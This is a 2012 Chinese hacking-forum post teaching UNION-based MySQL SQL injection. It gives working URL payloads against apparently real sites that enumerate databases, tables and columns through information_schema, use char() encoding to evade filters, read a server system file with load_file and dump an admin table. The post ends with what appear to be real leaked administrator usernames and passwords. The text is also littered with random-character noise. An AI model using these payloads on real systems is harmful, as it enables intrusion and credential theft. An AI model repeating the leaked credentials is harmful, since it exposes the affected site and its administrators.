找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2271|回复: 0
打印 上一主题 下一主题

mysql注入高效方法

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 16:37:34 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
此方法只适用于Mysql 5.0以及5.0以上版本 注入方法和mysql 5 类似9 d; T' h& ~# z3 {; w( H8 I9 V
但此方法大大提高了读取数据库的速度,此方法并非本人原创,原创出处是国外某牛人
5 N5 h  n/ {% E, r8 y, [6 S, B
0 ~4 s7 [6 [7 G. p* i
, Y8 C7 z( |" [9 p, [8 b/ h$ r优点在于可以利用information_schema库与group_concat的配合 来达到一次性读取出指定数据库里的内容,并且在limit被限制的情况下依然可以注入0 d1 s) d) n& B2 M7 K
( N4 i0 y* `0 Y! Y* v  T( G$ w
缺点 当一个库存在几百甚至几千个表和表字段和数据的时候 读取出数据的时间会相当的慢...
9 k+ l  W3 [  m* i% ~! N9 D' t: i/ F, `  ?
下面用简单实例来演示 原理不多说,相信经常玩注入的朋友都知道了.只挑重要部分实例演示  Y# s9 P. C  {5 W' z
在注入时根据实际情况作出变化 比如过滤了空格,使用/**/ ,  + 等等3 F6 C# Z- g" o' N# k% I6 b
( `9 S3 d/ u" R
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,database(),10,11,12,13,14,15,16,17
3 y% y% Z+ }8 Z) W' f6 Z
; L& `4 C5 d; t) B* g读出所有库:2 e9 I* F& {8 u5 ?2 a: t" f
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(schema_name),10,11,12,13,14,15,16,17 from information_schema.SCHEMATA
/ d: m& \# X3 ?$ R# z/ i, L$ L0 x
1 N# i. A6 P  W1 l7 Z

& O" ?2 ~! |+ x  U读出所有表:
3 V2 e6 R6 q- I( Z% vhttp://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(table_name),10,11,12,13,14,15,16,17 from information_schema.tables where table_schema=database()( g% m# a9 C' ~
& _6 F+ ~9 X- y1 d; i/ |
读出所有表字段:# ^" w0 v. P0 d
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(column_name),10,11,12,13,14,15,16,17 from information_schema.COLUMNS where table_schema=database() and table_name=char(97,100,109,105,110)
3 }( j8 u8 g1 V$ N- {*/ (97,100,109,105,110)为admin的ascii码 依次类推" e3 z6 ~2 i2 b' r

; z9 F) F/ j) N读出所有表字段里的内容:4 U& l7 v! I7 K; M* i
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,group_concat(password),group_concat(admin),10,11,12,13,14,15,16,17 from admin
6 q# N( k$ u$ x3 M& F4 p9 X1 X) Q9 v+ N) C6 D
1 F7 ~' X6 C: P" _  S8 l; t
1 m6 |% a7 N6 ^2 W
' m. {. y$ j1 h# G# s7 ~

5 o7 h* `! m' S. T
' Y5 w( G1 c' I$ Y+ Lhttp://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),load_file(CHAR(99, 58, 92, 98, 111, 111, 116, 46, 105, 110, 105)),4,5,6,7+%23  |9 ]2 Y/ W" @9 A4 A; I

# a$ {' n, k. a3 Z5 |, a8 W; S6 ?# {( }3 ~% D0 f4 h0 d
http://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(schema_name),4,5,6,7+from+information_schema.schemata%23
! C) Z# X& C' @7 q! s
5 ~/ v, ?9 Z! x$ f2 H& P( Q+ Xhttp://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(column_name),4,5,6,7+from+information_schema.COLUMNS where table_schema=database()+and+table_name=char(97,100,109,105,110)%239 e2 f% c2 }) [$ w) m

: e9 K7 b) e, B" p
; `. B5 s, y- v/ Jhttp://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(admin_name,0x3a,admin_password),4,5,6,7+from+admin%23# f1 a3 b; m1 O. x# n

: x4 _5 u5 n% R1 P0 y0 _* h7 |2 i. u2 N6 l4 e! ~0 s& Z! k5 h2 s
        webmaster:dzb521123,simlab:simadmin20043233
0 u% @$ U# W: M$ p/ u8 q) K
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表